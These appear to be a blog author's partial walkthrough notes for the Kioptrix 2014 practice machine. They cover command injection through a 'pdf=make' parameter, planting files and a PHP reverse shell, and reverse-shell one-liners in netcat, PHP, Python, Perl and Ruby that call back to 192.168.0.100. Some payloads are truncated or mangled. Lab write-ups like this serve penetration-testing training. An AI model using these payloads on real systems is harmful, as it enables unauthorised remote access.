Kioptrix 2014

Kioptrixx 2014 Notes - Full walkthrough to be updated


httpd.conf file

httpd Error Log

Executing system commands;id > out.txt&pdf=make

File creation tests
Create a file that shows the phpinfo of the system in the virtual directory /files/
This directory is writable by the webuser www;echo%20%22%3C?php%20phpinfo()%20?%3E%22%20%3E%20./files/zzz.php;&pdf=make

This is now listable from the URL

We can prove we can write HTML too by create a very simple test and executing the files to see the outcome:;echo%20%22%3Ch1%3Etest123%3C/h1%3E%22%20%3E%20test123.html;&pdf=make

Trying to create a backdoor.
Working method..

First we edit the Pentest Monkys php-reverse-shell with the attackers IP and the port 443 - this could be changed if need to a different port depending on needs and firewall.

Next we create a file called get.txt and within that file we add a line of code we want the file to execute once open.
The command within get.txt will download our reverse shell file later.;printf%20%22GET%20http://\r\n\r\n%22%20%3E%20get.txt;&pdf=make

Now we copy the r.txt file to our apache webservice. (when doing this origianlly with pythons simple https server it didnt work for some unknown reason)

make sure the file is in the root directory like so "/var/www/html/r.txt"

now we use nc to open the r.txt file from the attackers machine, then execute the file to download the reverse shell and rename the file to r.php;%20nc%20192.168.0.100%2080%20%3C%20get.txt%20%3E%20r.php;%20&pdf=make

Next we setup out nc listener

nc -l -v -p 4444

Now we execute the php file

And Voila a shell :-)

listening on [any] 4444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 60832
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012  amd64
10:47PM  up  6:15, 0 users, load averages: 0.00, 0.00, 0.00
USER       TTY      FROM                      LOGIN@  IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off

Things that didnt work..

Using PHP;php%20-r%20%27$sock=fsockopen(%22192.168.0.100%22,443);exec(%22/bin/sh%20-i%20%3C&6%20%3E&6%202%3E&6%22);%27;&pdf=make

Using NC  - Here we get a connection that immediately disconnects straight away;/bin/sh%20|%20nc%20192.168.0.100%20443;&pdf=make

#:~ sudo nc -l -p 443 -vvv                                                                                                                          listening on [any] 443 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 62073
 sent 1, rcvd 0

tried on ports 4444, 2345,5050 to no avail..
Maybe the firewall is blocking our connection..

Using NC another way;/bin/sh%20|%20nc%20-l%201234;&pdf=make

Using Python;/usr/local/bin/python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);[%22/bin/sh%22,%22-i%22]);%27;&pdf=make;/usr/local/bin/python2.7%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);[%22/bin/sh%22,%22-i%22]);%27;&pdf=make;/usr/local/include/python2.7%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);[%22/bin/sh%22,%22-i%22]);%27;&pdf=make

Lets check where Python is located and send the output to a files under the listable directory under '/files/' ....

Using 'locate' like so...;locate%20python%20%3E%20./files/out.txt&pdf=make

Now we open the file by:
##Output ## 

Using Perl;/usr/bin/perl%20-e%20%27use%20Socket;$i=%22192.168.0.100%22;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);};%27;&pdf=make

Using Ruby;/usr/bin/,4444).to_i;exec%20sprintf(%22/bin/sh%20-i%20%3C&%d%20%3E&%d%202%3E&%d%22,f,f,f)%27;&pdf=make


No comments:

Post a Comment